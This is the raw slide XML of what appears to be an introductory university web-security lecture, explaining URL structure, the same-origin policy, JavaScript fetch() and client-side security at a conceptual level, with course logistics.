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3"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="262" r:id="rId2"/>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="317" r:id="rId4"/>
    <p:sldId id="263" r:id="rId5"/>
    <p:sldId id="264"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6" r:id="rId32"/>
    <p:sldId id="297" r:id="rId33"/>
    <p:sldId id="298" r:id="rId34"/>
    <p:sldId id="299" r:id="rId35"/>
    <p:sldId id="300" r:id="rId36"/>
    <p:sldId id="301" r:id="rId37"/>
    <p:sldId id="302" r:id="rId38"/>
    <p:sldId id="303" r:id="rId39"/>
    <p:sldId id="304" r:id="rId40"/>
    <p:sldId id="306" r:id="rId41"/>
    <p:sldId id="305" r:id="rId42"/>
    <p:sldId id="307" r:id="rId43"/>
    <p:sldId id="308" r:id="rId44"/>
    <p:sldId id="309" r:id="rId45"/>
    <p:sldId id="310" r:id="rId46"/>
    <p:sldId id="311" r:id="rId47"/>
    <p:sldId id="312" r:id="rId48"/>
    <p:sldId id="313" r:id="rId49"/>
    <p:sldId id="314" r:id="rId50"/>
    <p:sldId id="315" r:id="rId51"/>
    <p:sldId id="31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23E48-BBB6-4CF5-8DF9-8C28CEC27F89}">
  <a:tblStyle styleId="{B0F23E48-BBB6-4CF5-8DF9-8C28CEC27F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6"/>
    <p:restoredTop sz="93075"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="358" d="100"/>
          <a:sy n="358" d="100"/>
        </p:scale>
        <p:origin x="76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en.wikipedia.org/wiki/Same-origin_policy#cite_note-2"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en.wikipedia.org/wiki/Same-origin_policy#cite_note-3"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ae44d03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ae44d03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ae44d03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ae44d03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ae44d037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ae44d03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d695f33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d695f33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695f33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695f33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d33b6cf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d33b6cf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www.techtarget.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>searchnetworking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/definition/URL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d695f33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d695f33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d695f33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d695f33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d695f331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d695f331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d695f331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d695f33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edf063a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edf063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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>github</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> repo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4d33b6cf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4d33b6cf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4d33b6cf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4d33b6cf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d695f331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d695f33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d695f331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d695f331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d695f331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d695f33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d695f331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d695f331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d695f331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d695f331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d695f360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d695f360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d695f360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d695f360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6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d695f360b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d695f360b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d695f360b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d695f360b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d695f360b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d695f360b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695f360b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695f360b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d695f360b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d695f360b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SzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Breaks ASLR: Examine memory to leak memory addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Breaks non-executable pages: Use memory that’s both writable and executable</a:t>
            </a:r>
          </a:p>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d695f360b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d695f360b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d695f360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d695f360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d695f360b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dd695f360b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73239"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Nunito" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="273239"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Nunito" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t> fetch() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="273239"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Nunito" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="273239"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Nunito" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="273239"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Nunito" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>in JavaScript is used to request data from a server.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d695f36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d695f36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d695f360b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d695f360b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dd695f360b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dd695f360b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d695f360b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d695f360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d695f360b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d695f360b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d695f360b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d695f360b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d695f360b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dd695f360b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It is very important to remember that the same-origin policy applies only to scripts. This means that resources such as images, CSS, and dynamically-loaded scripts can be accessed across origins via the corresponding HTML tags</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(with fonts being a notable exception</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366CC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>[3]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>). Attacks take advantage of the fact that the same origin policy does not apply to HTML tags.</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d695f360b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d695f360b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https://cci.charlotte.edu:443/sis-faculty/</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d695f360b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dd695f360b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d695f360b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d695f360b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d695f331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d695f331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dd695f360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dd695f36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d695f36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d695f36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d695f360b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d695f360b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ae44d03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ae44d03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Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> was from Netscape; more interactive and dynamic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="158750" indent="0" algn="l" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Client-side Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Since the JavaScript code is viewable to the user, others may use it for malicious purposes. These practices may include using the source code without authentication. Also, it is very easy to place some code into the site that compromises the security of data over the website.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ae44d03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ae44d03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ae44d037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ae44d037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ae44d037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ae44d03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5B0B6E5B-08BE-3EE4-9E49-B14CC8E9674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atalog.charlotte.edu/preview_program.php?catoid=30&amp;poid=8146"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jianxiang.info/teaching/ITIS6200/2023fa/index.html#schedul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800" dirty="0"/>
              <a:t>Three projects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-342900">
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Project #1 release later today</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Teaching feedback</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-342900">
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Schedule for the rest of the class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-342900">
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>In class: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-342900">
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Freewrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-342900">
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Quick questions time</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URLs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Google Shape;17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81" name="Google Shape;181;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 b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: How do we uniquely identify a piece of data on the web?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="Google Shape;188;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 (Uniform Resource Locator)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A string that uniquely identifies one piece of data on the web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A type of URI (Uniform Resource Identifier)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Google Shape;1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Scheme</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="Google Shape;195;p33"/>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just before the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>double slashes</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Defines how to retrieve the data over the Internet (which Internet protocol to use)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Protocols you should know</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>: Hypertext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https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>: A secure version of HTTP</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>We’ll see more about these later</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Other protocols include:</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ftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>: File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file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>: fetching a local file (e.g. on your computer)</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git+ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>: an SSH-tunneled git fetch</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>You don't need to know the details about these protocols</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Google Shape;19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Domain</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Google Shape;203;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double slashes, but before the next single slash</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Defines which web server to contact</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Recall: The web has many web servers. The location specifies which one we're looking for.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Written as several phrases separated by dots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-342900">
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://cci.charlotte.edu/sis-faculty/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:  Domain name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cci.charlotte.edu</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Google Shape;20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Location</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Google Shape;211;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Location: The domain with some additional information</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Port:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0097A7"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://cci.charlotte.edu:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>443</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0097A7"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>/sis-faculty/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Identifies one specific application on the web server</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>We will see ports again in the networking unit</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="Google Shape;21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Path</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="Google Shape;219;p36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198500" y="1246825"/>
            <a:ext cx="8568354"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first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>single slash</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Defines which file on the web server to fetch</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Think of the web server as having its own filesystem</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>The path represents a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>filepath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> on the web server's filesystem</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Examples</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>webpages.charlotte.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/wwang22/Research/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>projects.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>look in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>wwang22/Research </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>folder for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>projects.html</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Google Shape;22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Query</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="Google Shape;22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query is optional</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Located after a question mark</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Supplies arguments to the web server for processing</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Think of the web server as offering a function at a given path</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>To access this function, a user makes a request to the path, with some arguments in the query</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>The web server runs the function with the user's arguments and returns the result to the user</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
